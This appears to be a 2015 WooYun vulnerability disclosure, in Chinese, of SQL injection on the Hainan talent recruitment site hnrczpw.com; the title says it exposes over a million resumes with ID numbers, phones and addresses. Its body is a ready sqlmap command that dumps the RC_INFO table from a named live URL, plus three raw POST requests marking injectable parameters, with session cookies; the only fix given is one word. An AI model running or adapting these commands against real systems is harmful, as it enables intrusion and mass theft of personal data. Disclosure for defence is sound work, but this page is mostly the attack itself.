海南人才网SQL注入(导致百万简历泄漏/身份证/电话/家庭住址)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141488

漏洞标题：海南人才网SQL注入(导致百万简历泄漏/身份证/电话/家庭住址)

漏洞作者：路人甲

提交时间：2015-09-16 10:41

修复时间：2015-10-31 10:42

公开时间：2015-10-31 10:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-16：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-10-31：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

倘若下午四点就能见到你，我便在下午三点就能感到快乐

详细说明：

C:\Python27\sqlmap>sqlmap.py  -u "http://www.hnrczpw.com/gposinfo/freejobs/ztzph
/poslistbydwtype.asp?dwtype=11*&pagenum=30"  -D newjxrc -T RC_INFO --dump

Database: newjxrc
+--------------+---------+
| Table | Entries |
+--------------+---------+
| dbo.RC_INFO | 1228864 |
| dbo.groupPos | 30611 |
| dbo.postptj | 899 |
| dbo.indutj | 70 |
| dbo.wkregtj | 32 |
| dbo.cd_educ | 9 |
+--------------+---------+
Database: newjxrc
+-------------+---------+
| Table | Entries |
+-------------+---------+
| dbo.RC_INFO | 1228864 |
+-------------+---------+

漏洞证明：

赠送3个注入点

POST /gposinfo/jobs/y_n_order.asp?stat=1 HTTP/1.1
Host: www.hnrczpw.com   
Content-Length: 129  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: http://www.hnrczpw.com/  
Cookie: cacheid=E%3A%5Cwebsite%5Chnrczpw2014%5Ccachefile%5C2015830192456%2Edbx; ASPSESSIONIDCQQDTSAB=FMJMNPOAHAEGMMMHOIKPMMMI; once
%5Fsea0=2015%2F8%2F30+20%3A00%3A04%5Bs%5Dduring%3D30%26; c%5Fcounts=7; once%5Fsea1=2015%2F8%2F30+20%3A01%3A01%5Bs%5Dduring%3D1%26ktp%3Dcom%26keyword
%3D1%26; dwid=; rcid=vid=d8c901e6ec0111575f69508c7537f9d9&id=13466125; once%5Fsea2=2015%2F8%2F30+20%3A05%3A58%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword
%3D%D6%B0%CE%BB%C3%FB%B3%C6%26; once%5Fsea3=2015%2F8%2F30+20%3A06%3A04%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%3F%3F%3F%3Fu5B0u3BB%3Fu63C%3F%3F%3F
%26; once%5Fsea4=2015%2F8%2F30+22%3A40%3A10%5Bs%5Dduring%3D255%26ktp%3Dpos%26keyword%3D1%26; once%5Fsea5=2015%2F8%2F31+1%3A54%3A33%5Bs%5Dduring
%3D30%26; once%5Fsea6=2015%2F8%2F31+1%3A54%3A38%5Bs%5Dduring%3D30%26; once%5Fsea7=2015%2F8%2F31+1%3A54%3A40%5Bs%5Dduring%3D30%26; once
%5Fsea8=2015%2F8%2F30+19%3A59%3A23%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D1%26; once%5Fsea9=2015%2F8%2F30+20%3A00%3A02%5Bs%5Dduring%3D30%26ktp
%3Dcom%26keyword%3D%2D%2D%C7%EB%CC%EE%C8%EB%D6%B0%CE%BB%BB%F2%B5%A5%CE%BB%B9%D8%BC%FC%D7%D6%2D%2D%26; NewAspUsers%5FOnline=UserSessionID=21122592969; 
News%5FPingJia%5F1%5F633300=ok   
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36  
Accept: */*    
myemail=email.tst*&orderdays=0&ordernum=10&schname=cpbvgdal&Submit=%b1%a3%b4%e6%ce%d2%b5%c4%d6%b0%ce%bb%b6%a9%d4%c4&unid=

POST /gposinfo/member_new/rcadmin/resume2word2014.asp HTTP/1.1
Host: www.hnrczpw.com    
Content-Length: 62  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: http://www.hnrczpw.com/  
Cookie: cacheid=E%3A%5Cwebsite%5Chnrczpw2014%5Ccachefile%5C2015830192456%2Edbx; ASPSESSIONIDCQQDTSAB=FMJMNPOAHAEGMMMHOIKPMMMI; once
%5Fsea0=2015%2F8%2F30+20%3A00%3A04%5Bs%5Dduring%3D30%26; c%5Fcounts=7; once%5Fsea1=2015%2F8%2F30+20%3A01%3A01%5Bs%5Dduring%3D1%26ktp%3Dcom%26keyword
%3D1%26; dwid=; rcid=vid=d8c901e6ec0111575f69508c7537f9d9&id=13466125; once%5Fsea2=2015%2F8%2F30+20%3A05%3A58%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword
%3D%D6%B0%CE%BB%C3%FB%B3%C6%26; once%5Fsea3=2015%2F8%2F30+20%3A06%3A04%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%3F%3F%3F%3Fu5B0u3BB%3Fu63C%3F%3F%3F
%26; once%5Fsea4=2015%2F8%2F30+22%3A40%3A10%5Bs%5Dduring%3D255%26ktp%3Dpos%26keyword%3D1%26; once%5Fsea5=2015%2F8%2F31+1%3A54%3A33%5Bs%5Dduring
%3D30%26; once%5Fsea6=2015%2F8%2F31+1%3A54%3A38%5Bs%5Dduring%3D30%26; once%5Fsea7=2015%2F8%2F31+1%3A54%3A40%5Bs%5Dduring%3D30%26; once
%5Fsea8=2015%2F8%2F30+19%3A59%3A23%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D1%26; once%5Fsea9=2015%2F8%2F30+20%3A00%3A02%5Bs%5Dduring%3D30%26ktp
%3Dcom%26keyword%3D%2D%2D%C7%EB%CC%EE%C8%EB%D6%B0%CE%BB%BB%F2%B5%A5%CE%BB%B9%D8%BC%FC%D7%D6%2D%2D%26; NewAspUsers%5FOnline=UserSessionID=21122592969; 
News%5FPingJia%5F1%5F633300=ok  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36  
Accept: */*    
mchk=0&resumeid=O*

POST /jobs/y_n_order.asp?stat=Z* HTTP/1.1
Host: www.hnrczpw.com   
Content-Length: 129  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: http://www.hnrczpw.com/  
Cookie: cacheid=E%3A%5Cwebsite%5Chnrczpw2014%5Ccachefile%5C2015830192456%2Edbx; ASPSESSIONIDCQQDTSAB=FMJMNPOAHAEGMMMHOIKPMMMI; once%5Fsea0=2015%2F8%2F30+20%3A00%3A04%5Bs%5Dduring%3D30%26; c%5Fcounts=7; once%5Fsea1=2015%2F8%2F30+20%3A01%3A01%5Bs%5Dduring%3D1%26ktp%3Dcom%26keyword%3D1%26; dwid=; rcid=vid=d8c901e6ec0111575f69508c7537f9d9&id=13466125; once%5Fsea2=2015%2F8%2F30+20%3A05%3A58%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%D6%B0%CE%BB%C3%FB%B3%C6%26; once%5Fsea3=2015%2F8%2F30+20%3A06%3A04%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%3F%3F%3F%3Fu5B0u3BB%3Fu63C%3F%3F%3F%26; once%5Fsea4=2015%2F8%2F30+22%3A40%3A10%5Bs%5Dduring%3D255%26ktp%3Dpos%26keyword%3D1%26; once%5Fsea5=2015%2F8%2F31+1%3A54%3A33%5Bs%5Dduring%3D30%26; once%5Fsea6=2015%2F8%2F31+1%3A54%3A38%5Bs%5Dduring%3D30%26; once%5Fsea7=2015%2F8%2F31+1%3A54%3A40%5Bs%5Dduring%3D30%26; once%5Fsea8=2015%2F8%2F30+19%3A59%3A23%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D1%26; once%5Fsea9=2015%2F8%2F30+20%3A00%3A02%5Bs%5Dduring%3D30%26ktp%3Dcom%26keyword%3D%2D%2D%C7%EB%CC%EE%C8%EB%D6%B0%CE%BB%BB%F2%B5%A5%CE%BB%B9%D8%BC%FC%D7%D6%2D%2D%26; NewAspUsers%5FOnline=UserSessionID=21122592969; News%5FPingJia%5F1%5F633300=ok  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36  
Accept: */*    
myemail=sample%40email.tst&orderdays=0&ordernum=10&schname=gxtushlu&Submit=%b1%a3%b4%e6%ce%d2%b5%c4%d6%b0%ce%bb%b6%a9%d4%c4&unid=

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141488

漏洞标题：海南人才网SQL注入(导致百万简历泄漏/身份证/电话/家庭住址)

相关厂商：海南人才网

漏洞作者：路人甲

提交时间：2015-09-16 10:41

修复时间：2015-10-31 10:42

公开时间：2015-10-31 10:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141488

漏洞标题：海南人才网SQL注入(导致百万简历泄漏/身份证/电话/家庭住址)

相关厂商：海南人才网

漏洞作者： 路人甲

提交时间：2015-09-16 10:41

修复时间：2015-10-31 10:42

公开时间：2015-10-31 10:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0141488"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云